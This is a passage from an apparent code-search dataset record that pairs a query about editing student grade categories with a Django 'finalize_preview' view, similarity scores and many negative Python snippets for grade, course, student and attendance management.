shutit_global.shutit_global_object.shutit_objects:\n\t\t\t_finalize(fshutit)", "def print(self):\r\n self.print_avec_separateur()", "def __str__(self):\n return str(self.__student_name) + \" has grade \" + str(self.__grade_value) + \" at \" + str(self.__discipline_name)", "def finalize(self):\n self._db_obj.progress = self._db_obj.total\n self._db_obj.step = \"Complete\"\n self._db_obj.save()", "def conclusion():\n\n print('Program ends')" ]
[ "0.59876657", "0.57981944", "0.564417", "0.55673975", "0.55103207", "0.55028576", "0.5473704", "0.5460755", "0.5440873", "0.5409173", "0.53980476", "0.53825235", "0.5363283", "0.5363283", "0.5361439", "0.5361439", "0.5361439", "0.5361439", "0.5361439", "0.5361439", "0.53493667", "0.5339003", "0.5333089", "0.5324575", "0.53207976", "0.53089803", "0.52872986", "0.5278692", "0.52744025", "0.52744025", "0.5258739", "0.5258739", "0.5258739", "0.524245", "0.5235866", "0.52317953", "0.52265", "0.521021", "0.51947206", "0.5186745", "0.5182116", "0.5160306", "0.5149149", "0.5149149", "0.5139654", "0.51335347", "0.51210725", "0.51153135", "0.5104134", "0.5077344", "0.5075311", "0.5067085", "0.50563407", "0.5053425", "0.5039453", "0.5027204", "0.50263834", "0.5016588", "0.49890465", "0.4982327", "0.4979499", "0.49719533", "0.49704042", "0.4968685", "0.49673018", "0.49574807", "0.49509946", "0.4949447", "0.49425924", "0.493374", "0.49332815", "0.49230033", "0.4919448", "0.49132484", "0.49055716", "0.49011958", "0.48978043", "0.4895985", "0.48741275", "0.48720977", "0.48707616", "0.4870276", "0.4868955", "0.4845617", "0.4842831", "0.48428088", "0.4835685", "0.4827491", "0.48111808", "0.4809268", "0.48036283", "0.4802704", "0.48017222", "0.4793834", "0.47884807", "0.4781501", "0.47781157", "0.47766367", "0.47752693", "0.47736058" ]
0.5862954
1
Edit grade for a category as indexed by step. For each student as given by pk. Also edit the individual aspects of each grade category. For trackheads and responsible staff
def finalize_preview(request, pk, step=0): ts = get_timeslot() if not hasattr(ts, 'resultoptions'): raise PermissionDenied("Results menu is not yet visible.") else: if not get_timeslot().resultoptions.Visible: raise PermissionDenied("Results menu is not yet visible.") dstr = get_object_or_404(Distribution, pk=pk) if not hasattr(dstr, 'presentationtimeslot'): raise PermissionDenied('This student does not have a presentation planned. Please plan it first.') if not request.user.is_superuser and \ request.user != dstr.Proposal.Track.Head and \ request.user != dstr.Proposal.ResponsibleStaff and \ get_grouptype('3') not in request.user.groups.all() and \ request.user not in dstr.presentationtimeslot.Presentations.Assessors.all(): raise PermissionDenied("You do not have the correct permissions to view print preview.") return render(request, "results/finalize_grades.html", { "dstr": dstr, "catresults": dstr.results.all(), "final": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False, "finalgrade": dstr.TotalGradeRounded(), "preview": True, })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_course_enrollment(self, student_id, course_id, course_section_id, term):\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n UPDATE course_enrollments\n SET course_id = ?, course_section_id = ?\n WHERE student_id = ?\n (?,?,?)\"\"\",\n (course_id, course_section_id, student_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1", "def edit_grade(self, username: str, token: str, course_abbreviation: str, student_id: str, updated_grade: float) -> bool:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get the student's UID\n student_uid = self.get_uid(username=student_id)\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Run update in the DB\n cursor.execute('''\n UPDATE enrollment_records SET grade = ? WHERE uid = ? AND course_id = ?\n ''', (updated_grade, student_uid, course_id))\n self._db_connection.commit()\n\n return True", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self", "def eval_evalassignment(request, pk, pts):\n student = request.user.student\n evalassignment = Evalassignment.objects.\\\n filter(pk=pk, assignment__student=student).first()\n if evalassignment:\n evalassignment.grade_evaluation = pts\n evalassignment.save()\n redirect_item = '#assignment%s' % evalassignment.assignment.id\n else:\n redirect_item = ''\n return redirect('/dashboard_student/' + redirect_item)", "def edit_course(self, course):\n EDIT_COURSE = \"\"\"UPDATE Course SET subject_code = %s, credit_hours = %s, description = %s WHERE name = %s\"\"\"\n\n self.db_cursor.execute(EDIT_COURSE, (\n course.subject_code, course.credit_hours, course.description, course.name))\n self.db_connection.commit()\n\n DELETE_COURSE_TOPICS = \"\"\"DELETE FROM CourseTopics WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_TOPICS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_TOPICS = \"\"\"INSERT INTO CourseTopics (course_name, topic_id) VALUES (%s, %s)\"\"\"\n for ct in course.topics:\n self.db_cursor.execute(INSERT_COURSE_TOPICS, (course.name,ct))\n self.db_connection.commit()\n\n DELETE_COURSE_GOALS = \"\"\"DELETE FROM CourseGoals WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_GOALS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_GOALS = \"\"\"INSERT INTO CourseGoals (course_name, goal_id) VALUES (%s, %s)\"\"\"\n for cg in course.goals:\n self.db_cursor.execute(INSERT_COURSE_GOALS, (course.name, cg))\n self.db_connection.commit()", "def update_subcategory(self, control_type, *args):\n\n\t\tif control_type is 'intField':\n\t\t\tself.log('query intField and update others')\n\t\t\tintField_value = cmds.intField(self.grade_intField, query = True, value = True)\n\t\t\tself.log('intField is %s' % intField_value)\n\n\t\t\tself.current_grade_value = intField_value\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit=True, value = -intField_value)\n\t\t\tself.update_radios_default_comments(intField_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'slider':\n\n\t\t\tself.log('query slider and update others')\n\t\t\tslider_value = abs(cmds.intSlider(self.grade_slider, query = True, value = True))\n\t\t\tself.log('intSlider is %s' % slider_value)\n\n\t\t\tself.current_grade_value = slider_value\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = slider_value)\n\t\t\tself.update_radios_default_comments(slider_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'radioButton':\n\t\t\tself.log('query radio collection and update others')\n\t\t\tselected = cmds.radioCollection(self.grade_radio_collection, query = True, select = True)\n\t\t\tselected_letter = cmds.radioButton(selected, query = True, label = True)\n\t\t\tselected_letter = re.sub('\\\\+', 'plus', selected_letter)\n\t\t\tself.log('selected radioButton: %s' % selected_letter)\n\n\t\t\tself.current_grade_value = int(self.grade_values.find(selected_letter).text)\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit = True, value = -self.current_grade_value)\n\t\t\tself.log('selected_letter: %s' % selected_letter)\n\t\t\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = self.subcatXML.find('gradeComment').find(selected_letter).text)\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'default_comments_text':\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\n\t\telif control_type is 'example_comments_text':\n\t\t\tself.current_example_comment_text = cmds.scrollField(self.example_comments, query = True, text = True)\n\t\t\tself.log('examples updated')\n\t\t\tself.log(self.current_example_comment_text)\n\n\t\telse:\n\t\t\tself.current_comment_text = cmds.scrollField(self.comments_text_field, query = True, text = True)\n\t\t\tself.log('comments updated')\n\t\t\tself.log(self.current_comment_text)", "def modify_assignmentype(request, pk):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n if assignmentype:\n if request.method == 'POST':\n form = LightAssignmentypeForm(request.POST, instance=assignmentype)\n if form.is_valid():\n form.save()\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n else:\n form = LightAssignmentypeForm(instance=assignmentype)\n context = {}\n context['assignmentype_id'] = assignmentype.id\n context['message'] = 'Modify details of your assignment '\\\n '(keep current student list)'\n context['form'] = form\n context['type_post'] = 'modify'\n return render(request, 'gradapp/assignmentype_form.html', context)\n else:\n return redirect('gradapp:index')", "def edit_student(request, student_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tstudent = models.Student.objects.filter(\n\t\tpk=student_id, soft_delete=False\n\t).first()\n\tif not student:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"blood_groups\": context_helper.blood_group_helper(),\n\t\t\"guardian_types\": context_helper.guardian_type_helper(),\n\t\t\"gender_types\": context_helper.gender_helper(),\n\t\t'student_id': student_id\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tsname = request.POST.get('sname')\n\t\troll = request.POST.get('rno')\n\t\tdob = request.POST.get('dob')\n\t\tgender = request.POST.get('gender_picker')\n\t\tbgroup = request.POST.get('blood_group_picker')\n\t\tif bgroup == 'Choose option':\n\t\t\tbgroup = None\n\t\tphone = request.POST.get('phone')\n\t\tcurradd = request.POST.get('curradd')\n\t\tpermadd = request.POST.get('permadd')\n\t\tgname = request.POST.get('gname')\n\t\tcourse = request.POST.get('course_picker')\n\t\tbatch = request.POST.get('batch')\n\t\tgtype = request.POST.get('guardian_type_picker')\n\t\tgphone = request.POST.get('gphone')\n\t\temail = request.POST.get('email')\n\t\taddress_flag = request.POST.get('address_flag')\n\t\tprint (address_flag)\n\t\taddress_flag = True if address_flag == 'on' else False\n\t\tif address_flag == True:\n\t\t\tpermadd = curradd\n\t\ttry:\n\t\t\tif \"profile-img\" in request.FILES:\n\t\t\t\tstudent.photo = request.FILES[\"profile-img\"]\n\t\t\t\tupdate_fields.append('photo')\n\t\t\t\tactivity += 'Changed photo.\\n'\n\t\t\tif student.name != sname:\n\t\t\t\tstudent.name = sname\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed name to '+ str(sname) +'.\\n'\n\t\t\tif student.roll_no != roll:\n\t\t\t\tstudent.roll_no = roll\n\t\t\t\tupdate_fields.append('roll_no')\n\t\t\t\tactivity += 'Changed roll number to '+ str(roll) +'.\\n'\n\t\t\tif str(student.dob) != str(dob):\n\t\t\t\tstudent.dob = dob\n\t\t\t\tupdate_fields.append('dob')\n\t\t\t\tactivity += 'Changed DOB to ' + str(dob) + '.\\n'\n\t\t\tif student.gender != gender:\n\t\t\t\tstudent.gender = gender\n\t\t\t\tupdate_fields.append('gender')\n\t\t\t\tactivity += 'Changed gender to ' + str(gender) + '.\\n'\n\t\t\tif student.blood_group != bgroup:\n\t\t\t\tstudent.blood_group = bgroup\n\t\t\t\tupdate_fields.append('blood_group')\n\t\t\t\tactivity += 'Changed blood group to ' + str(bgroup) + '.\\n'\n\t\t\tif student.phone != phone:\n\t\t\t\tstudent.phone = phone\n\t\t\t\tupdate_fields.append('phone')\n\t\t\t\tactivity += 'Changed phone number to ' + str(phone) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.perm_address != permadd:\n\t\t\t\tstudent.perm_address = permadd\n\t\t\t\tupdate_fields.append('perm_address')\n\t\t\t\tactivity += 'Changed permanent address to ' + str(permadd) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.guardian_name != gname:\n\t\t\t\tstudent.guardian_name = gname\n\t\t\t\tupdate_fields.append('guardian_name')\n\t\t\t\tactivity += 'Changed current address to ' + str(gname) + '.\\n'\n\t\t\tif student.guardian_phone != gphone:\n\t\t\t\tstudent.guardian_phone = gphone\n\t\t\t\tupdate_fields.append('guardian_phone')\n\t\t\t\tactivity += 'Changed guardian phone to ' + str(gphone) + '.\\n'\n\t\t\tif student.guardian_type != gtype:\n\t\t\t\tstudent.guardian_type = gtype\n\t\t\t\tupdate_fields.append('guardian_type')\n\t\t\t\tactivity += 'Changed current address to ' + str(gtype) + '.\\n'\n\t\t\tif str(student.course.pk) != str(course):\n\t\t\t\tstudent.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif student.batch != batch:\n\t\t\t\tstudent.batch = batch\n\t\t\t\tupdate_fields.append('batch')\n\t\t\t\tactivity += 'Changed batch to' + str(batch) + '.\\n'\n\t\t\tif student.email != email:\n\t\t\t\tstudent.email = email\n\t\t\t\tupdate_fields.append('email')\n\t\t\t\tactivity += 'Changed email to ' + str(email) + '.\\n'\n\t\t\tif student.address_flag != address_flag:\n\t\t\t\tstudent.address_flag = address_flag\n\t\t\t\tupdate_fields.append('address_flag')\n\t\t\t\tactivity += 'Changed address flag.'\n\t\t\tstudent.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit student\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated student.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_student_info(student))\n\tif type(context_dict['dob']) == str:\n\t\tcontext_dict['dob'] = datetime.strptime(context_dict['dob'], '%Y-%m-%d')\n\tfor i in context_dict['course']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['blood_group']:\n\t\ttry: context_dict['blood_groups'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['guardian_type']:\n\t\ttry: context_dict['guardian_types'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['gender_type']:\n\t\ttry: context_dict['gender_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-students')\n\treturn render(\n\t\trequest, \"editStudent.html\", context_dict\n\t)", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def modify_an_entry(self):\n target_list = self.find_student()\n\n if not len(target_list):\n print('There is no contents to show')\n else:\n opt = self.input_options(['midterm', 'finalterm'], 1, 'Which test do you want to modify?')\n score = self.input_score()\n\n if opt.upper() == 'MIDTERM':\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'midterm'] = score\n else:\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'finalterm'] = score", "def insert_question_assignmentype(request, pk, cd):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n cd = int(cd)\n if cd == 1:\n classForm = AddQuestionForm\n info = 'Add'\n elif cd == -1:\n classForm = RemoveQuestionForm\n info = 'Remove'\n if assignmentype:\n if request.method == 'POST':\n form = classForm(request.POST,\n nb_questions=assignmentype.nb_questions)\n if form.is_valid():\n question = form.cleaned_data['question']\n # Modify attribute question of all associated evalquestion\n if cd == -1:\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question=question)\n evalquestions.delete()\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question__gte=question)\n evalquestions.update(question=F('question') + cd)\n # Create a new evalquestion for each evalassignment (if cd=1)\n # and inform that it has to be graded\n for evalassignment in Evalassignment.objects.filter(\n assignment__assignmentype=assignmentype):\n if cd == 1:\n Evalquestion.objects.create(\n evalassignment=evalassignment, question=question)\n evalassignment.reset_grade()\n elif cd == -1:\n evalassignment.grade_assignment = None\n evalassignment.save()\n # Add a question to the assignmentype\n assignmentype.nb_questions += cd\n if cd == 1:\n if assignmentype.questions_coeff:\n assignmentype.questions_coeff.insert(question - 1, None)\n if assignmentype.questions_statement:\n assignmentype.questions_statement.insert(question - 1,\n None)\n assignmentype.save()\n elif cd == -1:\n if assignmentype.questions_coeff:\n del assignmentype.questions_coeff[question - 1]\n if assignmentype.questions_statement:\n del assignmentype.questions_statement[question - 1]\n assignmentype.save()\n log = tasks.compute_grades_assignmentype(assignmentype.pk)\n logger.info(log)\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n form = classForm(nb_questions=assignmentype.nb_questions)\n context = {'assignmentype': assignmentype, 'form': form, 'info': info,\n 'cd': cd}\n return render(request, 'gradapp/insert_question.html', context)\n else:\n return redirect('gradapp:index')", "def edit(self, **kwargs):\n ...", "def save_grade(request, course_id):\r\n\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n _check_access(request.user, course_key)\r\n\r\n if request.method != 'POST':\r\n raise Http404\r\n p = request.POST\r\n required = set(['score', 'feedback', 'submission_id', 'location', 'submission_flagged'])\r\n skipped = 'skipped' in p\r\n #If the instructor has skipped grading the submission, then there will not be any rubric scores.\r\n #Only add in the rubric scores if the instructor has not skipped.\r\n if not skipped:\r\n required.add('rubric_scores[]')\r\n actual = set(p.keys())\r\n missing = required - actual\r\n if len(missing) > 0:\r\n return _err_response('Missing required keys {0}'.format(\r\n ', '.join(missing)))\r\n\r\n success, message = check_feedback_length(p)\r\n if not success:\r\n return _err_response(message)\r\n\r\n grader_id = unique_id_for_user(request.user)\r\n\r\n location = course_key.make_usage_key_from_deprecated_string(p['location'])\r\n\r\n try:\r\n result = staff_grading_service().save_grade(course_key,\r\n grader_id,\r\n p['submission_id'],\r\n p['score'],\r\n p['feedback'],\r\n skipped,\r\n p.getlist('rubric_scores[]'),\r\n p['submission_flagged'])\r\n except GradingServiceError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"Error saving grade in the staff grading interface in open ended grading. Request: {0} Course ID: {1}\".format(\r\n request, course_id))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n except ValueError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"save_grade returned broken json in the staff grading interface in open ended grading: {0}\".format(\r\n result_json))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n if not result.get('success', False):\r\n #This is a dev_facing_error\r\n log.warning(\r\n 'Got success=False from staff grading service in open ended grading. Response: {0}'.format(result_json))\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n # Ok, save_grade seemed to work. Get the next submission to grade.\r\n return HttpResponse(json.dumps(_get_next(course_id, grader_id, location)),\r\n mimetype=\"application/json\")", "def edit_subject(request,subject_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.subject_permit:\n\t\traise Http404\n\tsubject = models.Subject.objects.filter(\n\t\tpk=subject_id, soft_delete=False\n\t).first()\n\tif not subject:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"subject_types\": context_helper.subject_type_helper(),\n\t\t'subject_id': subject_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tcourse = request.POST.get('course_picker')\n\t\tname = request.POST.get('sname')\n\t\tsid = request.POST.get('sid')\n\t\tstype = request.POST.get('subject_picker')\n\t\tmaxmarks = request.POST.get('marks')\n\t\ttry:\n\t\t\tif str(subject.course.pk) != str(course):\n\t\t\t\tsubject.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif subject.s_type != stype:\n\t\t\t\tsubject.s_type = stype\n\t\t\t\tupdate_fields.append('s_type')\n\t\t\t\tactivity += 'Changed subject type to ' + str(stype) + '.\\n'\n\t\t\tif subject.name != name:\n\t\t\t\tsubject.name = name\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed subject name to' + str(name) + '.\\n'\n\t\t\tif subject.s_id != sid:\n\t\t\t\tsubject.s_id = sid\n\t\t\t\tupdate_fields.append('s_id')\n\t\t\t\tactivity += 'Changed subject ID to' + str(sid) + '.\\n'\n\t\t\tif subject.max_marks != maxmarks:\n\t\t\t\tsubject.max_marks = maxmarks\n\t\t\t\tupdate_fields.append('max_marks')\n\t\t\t\tactivity += 'Changed maximum marks to' + str(maxmarks) + '.\\n'\n\t\t\tsubject.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit subject\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Result Data.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_subject_info(subject))\n\tfor i in context_dict['courses']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['subject_type']:\n\t\ttry: context_dict['subject_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-subjects')\n\treturn render(\n\t\trequest, \"editSubject.html\", context_dict\n\t)", "def edit_person(self, pk):", "def _grade(student, request, course, keep_raw_scores):\r\n grading_context = course.grading_context\r\n raw_scores = []\r\n\r\n # Dict of item_ids -> (earned, possible) point tuples. This *only* grabs\r\n # scores that were registered with the submissions API, which for the moment\r\n # means only openassessment (edx-ora2)\r\n submissions_scores = sub_api.get_scores(\r\n course.id.to_deprecated_string(), anonymous_id_for_user(student, course.id)\r\n )\r\n\r\n totaled_scores = {}\r\n # This next complicated loop is just to collect the totaled_scores, which is\r\n # passed to the grader\r\n for section_format, sections in grading_context['graded_sections'].iteritems():\r\n format_scores = []\r\n for section in sections:\r\n section_descriptor = section['section_descriptor']\r\n section_name = section_descriptor.display_name_with_default\r\n\r\n # some problems have state that is updated independently of interaction\r\n # with the LMS, so they need to always be scored. (E.g. foldit.,\r\n # combinedopenended)\r\n should_grade_section = any(\r\n descriptor.always_recalculate_grades for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n # If there are no problems that always have to be regraded, check to\r\n # see if any of our locations are in the scores from the submissions\r\n # API. If scores exist, we have to calculate grades for this section.\r\n if not should_grade_section:\r\n should_grade_section = any(\r\n descriptor.location.to_deprecated_string() in submissions_scores\r\n for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n if not should_grade_section:\r\n with manual_transaction():\r\n should_grade_section = StudentModule.objects.filter(\r\n student=student,\r\n module_state_key__in=[\r\n descriptor.location for descriptor in section['xmoduledescriptors']\r\n ]\r\n ).exists()\r\n\r\n # If we haven't seen a single problem in the section, we don't have\r\n # to grade it at all! We can assume 0%\r\n if should_grade_section:\r\n scores = []\r\n\r\n def create_module(descriptor):\r\n '''creates an XModule instance given a descriptor'''\r\n # TODO: We need the request to pass into here. If we could forego that, our arguments\r\n # would be simpler\r\n with manual_transaction():\r\n field_data_cache = FieldDataCache([descriptor], course.id, student)\r\n return get_module_for_descriptor(student, request, descriptor, field_data_cache, course.id)\r\n\r\n for module_descriptor in yield_dynamic_descriptor_descendents(section_descriptor, create_module):\r\n\r\n (correct, total) = get_score(\r\n course.id, student, module_descriptor, create_module, scores_cache=submissions_scores\r\n )\r\n if correct is None and total is None:\r\n continue\r\n\r\n if settings.GENERATE_PROFILE_SCORES: \t# for debugging!\r\n if total > 1:\r\n correct = random.randrange(max(total - 2, 1), total + 1)\r\n else:\r\n correct = total\r\n\r\n graded = module_descriptor.graded\r\n if not total > 0:\r\n #We simply cannot grade a problem that is 12/0, because we might need it as a percentage\r\n graded = False\r\n\r\n scores.append(Score(correct, total, graded, module_descriptor.display_name_with_default))\r\n\r\n _, graded_total = graders.aggregate_scores(scores, section_name)\r\n if keep_raw_scores:\r\n raw_scores += scores\r\n else:\r\n graded_total = Score(0.0, 1.0, True, section_name)\r\n\r\n #Add the graded total to totaled_scores\r\n if graded_total.possible > 0:\r\n format_scores.append(graded_total)\r\n else:\r\n log.exception(\"Unable to grade a section with a total possible score of zero. \" +\r\n str(section_descriptor.location))\r\n\r\n totaled_scores[section_format] = format_scores\r\n\r\n grade_summary = course.grader.grade(totaled_scores, generate_random_scores=settings.GENERATE_PROFILE_SCORES)\r\n\r\n # We round the grade here, to make sure that the grade is an whole percentage and\r\n # doesn't get displayed differently than it gets grades\r\n grade_summary['percent'] = round(grade_summary['percent'] * 100 + 0.05) / 100\r\n\r\n letter_grade = grade_for_percentage(course.grade_cutoffs, grade_summary['percent'])\r\n grade_summary['grade'] = letter_grade\r\n grade_summary['totaled_scores'] = totaled_scores \t# make this available, eg for instructor download & debugging\r\n if keep_raw_scores:\r\n grade_summary['raw_scores'] = raw_scores # way to get all RAW scores out to instructor\r\n # so grader can be double-checked\r\n return grade_summary", "def editDetail(id):\n form = EditDetailForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/edit.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editDetailSection\", id=id ,section=section))", "def edit_attendance(request, attendance_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tattendance = models.Attendance.objects.filter(\n\t\tpk=attendance_id, soft_delete=False\n\t).first()\n\tprint(\"1\")\n\tcontext_dict = {\n\t\t\"all_subjects\": context_helper.subject_helper(),\n\t\t'attendance_id': attendance_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\troll = request.POST.get('roll')\n\t\tsubject = request.POST.get('subject_picker')\n\t\tobtained = request.POST.get('attendance')\n\t\ttotal = request.POST.get('total')\n\t\tstudent = models.Student.objects.filter(\n\t\t\troll_no=roll\n\t\t).first()\n\t\tif not student:\n\t\t\tcontext_dict[\"message\"] = 'Student at does not exist / Roll number has not been alloted.'\n\t\t\treturn render(request, \"editAttendance.html\", context_dict)\n\t\ttry:\n\t\t\tif attendance.student != student:\n\t\t\t\tattendance.student = student\n\t\t\t\tupdate_fields.append('student')\n\t\t\t\tactivity += 'Changed student to ' + str(student) + '.\\n'\n\t\t\tif attendance.total_attendance != total:\n\t\t\t\tattendance.total_attendance = total\n\t\t\t\tupdate_fields.append('total_attendance')\n\t\t\t\tactivity += 'Changed total attendance to ' + str(total) + '.\\n'\n\t\t\tif attendance.obtained_attendance != obtained:\n\t\t\t\tattendance.obtained_attendance = obtained\n\t\t\t\tupdate_fields.append('obtained_attendance')\n\t\t\t\tactivity += 'Changed obtained attendance to' + str(obtained) + '.\\n'\n\t\t\tif str(attendance.subject.pk) != str(subject):\n\t\t\t\tattendance.subject = models.Subject.objects.get(pk=subject)\n\t\t\t\tupdate_fields.append('subject')\n\t\t\t\tactivity += 'Changed subject to ' + str(subject) + '.\\n'\n\t\t\tattendance.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit attendance\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Attendance.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_attendance_info(attendance))\n\tfor i in context_dict['subjects']:\n\t\t# use for dynamic\n\t\ttry: del context_dict['all_subjects'][i]\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-attendance')\n\treturn 